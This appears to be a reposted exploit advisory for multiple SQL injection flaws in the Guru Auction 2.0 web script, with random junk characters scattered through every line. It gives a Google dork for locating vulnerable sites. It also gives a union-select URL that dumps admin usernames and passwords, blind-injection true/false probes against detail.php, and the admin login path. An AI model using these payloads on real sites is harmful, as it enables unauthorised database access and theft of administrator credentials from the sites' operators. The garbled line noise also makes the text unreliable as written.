Guru Auction 2.0 Multiple SQL Injection Vulnerabilities h1 a7 V" k M. c% I( X
+ ^* X0 [6 h5 G
作者 : v3n0m4 j. H7 N! k, s1 ^' `
应用 : Guru Auction 2.0
6 q9 r3 I4 p) kPrice : $49
0 y) `) d' C4 H$ L3 A+ OVendor : http://www.guruscript.com/& H9 u, b" ^' Y( t& a6 c2 Q7 B
Google Dork : inurl:subcat.php?cate_id=
1 l7 [5 W. h/ T* e+ [
+ k0 k# M( Z7 \7 r7 r( c$ kSQLi p0c:
6 j" o3 U, ~ w~~~~~~~~~~
( f* X4 d, t6 X+ Z. k0 s& khttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--: j0 a- C, y! d
1 B, D/ G3 {7 o) x ; ]$ y/ p2 d3 {/ h$ J
盲注 p0c:
: [9 _- F: c7 E- b o~~~~~~~~~~
5 v# _' c5 x b8 W/ Ehttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true7 p. H* j$ T/ M9 n: q
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false. L+ B: m; G8 E( W/ ]
$ t# I) b' Z+ C4 h; s Q+ S
管理登录入口:1 o+ s1 s: W; e, ]! v7 v$ i
~~~~~~~~~~
8 @0 r5 f( o$ z8 ]1 `* L1 jhttp://domain.tld/[path]/admin/
6 ~9 X+ R" a4 f4 l7 I3 ^ |